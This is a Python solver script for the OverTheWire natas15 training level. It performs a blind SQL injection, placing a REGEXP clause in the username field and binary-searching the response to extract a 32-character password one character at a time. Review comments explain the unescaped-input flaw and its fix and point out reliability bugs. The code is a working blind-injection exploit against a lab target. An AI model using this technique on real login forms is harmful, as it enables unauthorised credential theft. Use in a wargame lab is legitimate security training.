Created
June 23, 2015 12:19
import math
import string

import requests

# Solver for the OverTheWire natas15 training level. It recovers a
# 32-character value one position at a time, binary-searching a 62-character
# alphabet and using the word 'exists' in the response as a yes/no signal.
#
# NOTE(review): this presumably relies on the server placing the submitted
# username into its SQL text unescaped and answering differently for true and
# false conditions. Binding the username as a query parameter on the server
# side would remove that signal; confirm against the level's source.
#
# In server logs this run shows up as roughly six POSTs per position, each
# carrying a REGEXP clause inside the username field.

# Template submitted as the username; %s receives the anchored regex.
SQL_INJECTION = 'natas16" AND password REGEXP BINARY "^%s$"; -- '

# Sent as HTTP Basic auth over plain http://, so it is readable in transit.
auth = ('natas15', '__CENSORED__')

characters = string.ascii_lowercase + string.ascii_uppercase + string.digits
total_characters = len(characters)
password_length = 32

matching = ''
while len(matching) < password_length:
    # Number of still-unknown characters after the position being resolved.
    tail_length = password_length - len(matching) - 1
    lo, hi = 0, total_characters
    matching_char = ''
    while not matching_char:
        # Round up so the lower half is never empty.
        mid = int(math.ceil((hi + lo) / 2.0))
        candidates = characters[lo:mid]
        password_regex = '%s[%s][a-zA-Z0-9]{%i}' % (matching, candidates, tail_length)
        print('%s %i-%i (%i)' % (candidates, lo, mid, hi))
        print(password_regex)
        response = requests.post(
            'http://natas15.natas.labs.overthewire.org/index.php',
            auth=auth,
            data={'username': SQL_INJECTION % password_regex},
        )
        hit = 'exists' in response.text
        if mid - lo <= 1:
            # Only one candidate was tested: a hit confirms it, and a miss is
            # taken to mean the next character in the alphabet.
            # NOTE(review): the HTTP status is never checked, so a failed
            # request counts as a miss and can select the wrong character
            # (or raise IndexError at the end of the alphabet).
            matching_char = characters[lo] if hit else characters[lo + 1]
        if hit:
            hi = mid
        else:
            lo = mid
    matching += matching_char
    print('found: %s' % (matching_char))
print('found password: %s' % matching)